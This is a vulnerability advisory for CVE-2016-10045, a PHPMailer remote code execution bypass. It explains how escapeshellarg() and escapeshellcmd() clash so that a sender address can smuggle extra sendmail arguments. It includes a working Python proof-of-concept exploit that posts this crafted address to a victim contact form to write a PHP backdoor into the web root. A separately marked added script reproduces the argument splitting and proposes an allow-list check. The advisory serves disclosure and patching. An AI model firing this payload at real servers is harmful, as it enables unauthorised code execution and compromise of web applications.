~~~~~~~~~~~~~ ExploitBox.io ~~~~~~~~~~~~~~~~
Interested in security / vulns / exploits ?
ExploitBox.io
A Playground & Labs for security folks into
hacking & the art of exploitation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- CVE-2016-10045
- Release date: 27.12.2016
- Last revision: 28.12.2016
- Revision 3.0
- Severity: Critical
=============================================
I. VULNERABILITY
-------------------------
PHPMailer < 5.2.20 Remote Code Execution (0day Patch Bypass/exploit)
II. BACKGROUND
-------------------------
"PHPMailer continues to be the world's most popular transport class, with an
estimated 9 million users worldwide. Downloads continue at a significant
pace daily."
http://phpmailer.worxware.com/
"Probably the world's most popular code for sending email from PHP!
Used by many open-source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii,
Joomla! and many more"
https://github.com/PHPMailer/PHPMailer
III. INTRODUCTION
-------------------------
Independent research uncovered a critical vulnerability in PHPMailer that
could potentially be used by (unauthenticated) remote attackers to achieve
remote arbitrary code execution in the context of the web server user and
remotely compromise the target web application.
To exploit the vulnerability an attacker could target common website
components such as contact/feedback forms, registration forms, password
email resets and others that send out emails with the help of a vulnerable
version of the PHPMailer class.
The first patch of the vulnerability CVE-2016-10033 was incomplete.
This advisory demonstrates the bypass of the patch.
The bypass allows Remote Code Execution on all current versions
(including 5.2.19).
NOTE:
The vulnerability / patch bypass was responsibly reported to the vendor
in private on December 26th and a new CVE was issued by MITRE on the same day.
However, a potential bypass was publicly discussed on the oss-sec list.
Holding the advisory further would serve no purpose, which is what triggered
the earlier release of this advisory.
IV. DESCRIPTION
-------------------------
The patch for the CVE-2016-10033 vulnerability, added in PHPMailer 5.2.17,
sanitizes the $Sender variable by applying escapeshellarg() escaping
before the value is passed to the mail() function.
It does not, however, take into account the clash between
escapeshellarg() and the internal escapeshellcmd() escaping that the
mail() function performs on its 5th parameter.
As a result it is possible to inject an extra quote that does not get
properly escaped and break out of the escapeshellarg() protection
applied by the patch in PHPMailer 5.2.17.
For example:
$mail->SetFrom("\"Attacker\\' -Param2 -Param3\"@test.com", 'Client Name');
will result in the following list of arguments passed to the sendmail program:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-f\"Attacker\\\]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@test.com']
An attacker could pass the -X parameter of sendmail to write out a
log file with arbitrary PHP code.
This makes the current latest versions of PHPMailer, 5.2.18 and 5.2.19,
vulnerable to Remote Code Execution despite the patch.
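To make the argument splitting above reproducible, and to give callers a check they can apply before a sender value ever reaches mail(), the following Python script is an added example; it is not part of this advisory and not PHPMailer's code. It reimplements the Unix behaviour of PHP's escapeshellarg() and escapeshellcmd() (an assumption based on their documented behaviour), runs the advisory's example sender through the same two layers of escaping, splits the result the way /bin/sh would, and reproduces the six-argument list shown above. The is_shell_safe() allow-list is a suggested caller-side pre-check, not the vendor's fix.

```python
import shlex

# Added worked example; not from the advisory or from PHPMailer.
# escapeshellarg()/escapeshellcmd() below are Python re-implementations
# modelled on the documented Unix behaviour of the PHP functions (assumption).

SENDMAIL = "/usr/sbin/sendmail"


def escapeshellarg(s):
    """PHP escapeshellarg() on Unix: wrap in single quotes and turn each
    embedded ' into '\\'' (close quote, backslash-escaped quote, reopen)."""
    return "'" + s.replace("'", "'\\''") + "'"


def escapeshellcmd(s):
    """PHP escapeshellcmd() on Unix: backslash-prefix shell metacharacters.
    Quote characters are escaped only when they are NOT paired; that rule is
    what clashes with the '\\'' sequence escapeshellarg() produces."""
    special = set("#&;`|*?~<>^()[]{}$\\\n\xff")
    out = []
    pending = None  # index of the quote that closes the currently open pair
    for i, c in enumerate(s):
        if c in "'\"":
            if pending is None:
                j = s.find(c, i + 1)
                if j != -1:
                    pending = j          # paired: both ends stay unescaped
                    out.append(c)
                    continue
            elif pending == i:
                pending = None           # closing quote of the open pair
                out.append(c)
                continue
            out.append("\\" + c)         # unpaired, or nested in another pair
        elif c in special:
            out.append("\\" + c)
        else:
            out.append(c)
    return "".join(out)


def build_sendmail_argv(sender):
    """Reproduce the 5.2.17-5.2.19 code path the advisory describes:
    PHPMailer applies escapeshellarg() to $Sender, mail() then applies
    escapeshellcmd() to the whole 5th parameter, and /bin/sh splits it."""
    params = "-f" + escapeshellarg(sender)   # PHPMailer's patched code path
    params = escapeshellcmd(params)          # mail()'s internal escaping
    return shlex.split(SENDMAIL + " -t -i " + params)


def is_shell_safe(addr):
    """Conservative allow-list: the value must survive both escaping layers
    unchanged and contain only ASCII alphanumerics plus @ _ - .
    Suggested caller-side pre-check (assumption), not PHPMailer's own fix."""
    if escapeshellcmd(addr) != addr or escapeshellarg(addr) != "'" + addr + "'":
        return False
    return all((ch.isascii() and ch.isalnum()) or ch in "@_-." for ch in addr)


# Sender value from the advisory's example (the PHP literal
# "\"Attacker\\' -Param2 -Param3\"@test.com"); BENIGN_SENDER is constructed.
ATTACK_SENDER = r'"Attacker\' -Param2 -Param3"@test.com'
BENIGN_SENDER = "user@example.com"

if __name__ == "__main__":
    for sender in (BENIGN_SENDER, ATTACK_SENDER):
        print("sender     :", sender)
        print("shell-safe :", is_shell_safe(sender))
        for n, arg in enumerate(build_sendmail_argv(sender)):
            print("Arg no. %d == [%s]" % (n, arg))
        print()
```

Running the script prints the benign case as a single `-fuser@example.com` argument and the advisory's case as the six arguments listed above. The mechanism is visible in the intermediate string: escapeshellcmd() backslash-escapes the `\` that escapeshellarg() inserted into `'\''`, so the shell reads close-quote, literal backslash, empty quotes, and everything after the space becomes separate arguments.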
A working PoC is presented below.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
#!/usr/bin/python
#PHPMailer_RCE_exploit.py
intro = """
PHPMailer RCE PoC Exploits
PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
+
PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
(the bypass of the first patch for CVE-2016-10033)
Discovered and Coded by:
Dawid Golunski
@dawid_golunski
https://legalhackers.com
"""
usage = """
Usage:
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.txt
PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Disclaimer:
For testing purposes only. Do no harm.
"""
import time
import urllib
import urllib2
import socket
import sys
RW_DIR = "/var/www/html/uploads"
url = 'http://VictimWebServer/contact_form.php' # Set destination URL here
# Choose/uncomment one of the payloads:
# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
#payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR
# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % RW_DIR
######################################
# PHP code to be saved into the backdoor php file on the target in RW_DIR
RCE_PHP_CODE = "<?php phpinfo(); ?>"
post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}
# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
~~~~~~~~~~~
A more advanced exploit targeting a contact form can be found at:
https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py
The researcher also developed an Unauthenticated RCE exploit for a popular
open-source application (deployed on the Internet on more than a million servers)
as a PoC for real-world exploitation. It might be published after the vendor has
fixed the vulnerabilities.
Video PoC:
~~~~~~~~~~~~~
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
VI. BUSINESS IMPACT
-------------------------
A successful exploitation could let remote attackers gain access to
the target server in the context of the web server account, which could
lead to a full compromise of the web application.
VII. SYSTEMS AFFECTED
-------------------------
All current versions of PHPMailer (< 5.2.20) are affected.
Note that exploitation is not limited to systems with Sendmail MTA.
VIII. SOLUTION
-------------------------
No official solution is available at the moment.
NOTE:
The vulnerability / patch bypass was responsibly reported to the vendor
in private on December 26th and a new CVE was issued by MITRE on the same day.
However, a potential bypass was publicly discussed on the oss-sec list.
Holding the advisory further would serve no purpose, which is what triggered
the earlier release of this advisory.
The vendor has been working on a new patch since the private disclosure
on 26th December which should be published shortly.
IX. REFERENCES
-------------------------
https://legalhackers.com
This advisory (CVE-2016-10045):
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
WordPress Core 4.6 - RCE Remote Code Execution PoC Exploit:
https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
https://www.youtube.com/watch?v=ZFt_S5pQPX0
The original vuln of CVE-2016-10033:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
Video PoC exploit:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
https://www.youtube.com/watch?v=xyYMYvT2bx8
Exploit code:
The simple PoC shown above is available here:
https://legalhackers.com/exploits/CVE-2016-10045/PHPMailer_RCE_exploit.py
Combined exploit code for multiple targets:
https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py
Other exploits with other attack vectors will be disclosed at a later date to
allow more time for patching.
The previously undisclosed techniques and exploitation vectors will be described in a security
white-paper at:
https://legalhackers.com/papers/Pwning-PHP-mail-func-For-Fun-And-RCE-New-Exploit-Techniques-Vectors.html
https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html
CVE-2016-10045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10045
PHPMailer / Vendor security updates / notices:
https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md
https://github.com/PHPMailer/PHPMailer
https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md
http://php.net/manual/en/function.mail.php
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
https://legalhackers.com
XI. REVISION HISTORY
-------------------------
28.12.2016 - Added NOTEs explaining the reason for the earlier disclosure
28.12.2016 - Advisory updated to extend the description
27.12.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.